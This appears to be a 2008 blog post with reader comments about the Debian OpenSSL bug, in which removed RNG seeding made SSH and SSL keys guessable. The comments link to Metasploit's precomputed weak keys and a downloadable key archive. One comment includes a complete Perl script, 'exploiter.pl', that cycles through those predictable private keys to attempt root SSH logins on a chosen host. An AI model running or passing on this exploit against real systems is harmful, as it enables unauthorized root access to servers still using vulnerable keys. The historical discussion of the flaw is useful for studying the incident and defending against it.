Ignorance Is Bliss
Hail to ubersmart packager, who thinks to know cryptography…
http://it.slashdot.org/it/08/05/13/1533212.shtml
“Debian package maintainers tend to very often modify the source code of the package they are maintaining so that it better fits into the distribution itself. However, most of the time, their changes are not sent back to upstream for validation, which might cause some tension between upstream developers and Debian packagers. Today, a critical security advisory has been released: a Debian packager modified the source code of OpenSSL back in 2006 so as to remove the seeding of OpenSSL random number generator, which in turns makes cryptographic key material generated on a Debian system guessable. The solution? Upgrade OpenSSL and re-generate all your SSH and SSL keys. This problem not only affects Debian, but also all its derivatives, such as Ubuntu.”
Remove RNG seeding! WTF was he thinking!
on May 14th, 2008 at 11:16 pm
http://metasploit.com/users/hdm/tools/debian-openssl/
on May 15th, 2008 at 9:22 am
based on a post from Markus Müller
http://www.deadbeef.de/rsa.2048.tar.bzip2
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print “Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n”;
print “Example: ./exploiter.pl /root/keys/ 127.0.0.1\n”;
print “By mm@deadbeef.de\n”;
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die(”opendir”);
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system(”echo “.join(” “, @a).”; ssh -l root “.join(” “, map { “-i
“.$_ } @a).” “.$ARGV[1]);
@a = ();
}
}
on May 15th, 2008 at 7:26 pm
http://img502.imageshack.us/img502/2996/pmeo9hcjp7aw9.jpg
on May 15th, 2008 at 10:15 pm
http://imgs.xkcd.com/comics/random_number.png